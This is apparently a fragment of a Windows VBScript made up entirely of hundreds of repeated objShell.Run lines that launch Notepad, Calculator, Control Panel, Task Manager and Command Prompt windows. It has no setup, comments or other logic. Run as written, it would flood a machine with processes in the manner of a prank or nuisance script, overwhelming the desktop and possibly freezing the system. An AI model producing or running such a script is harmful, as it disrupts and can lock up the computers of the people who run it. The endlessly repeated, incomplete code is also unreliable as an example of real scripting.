objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
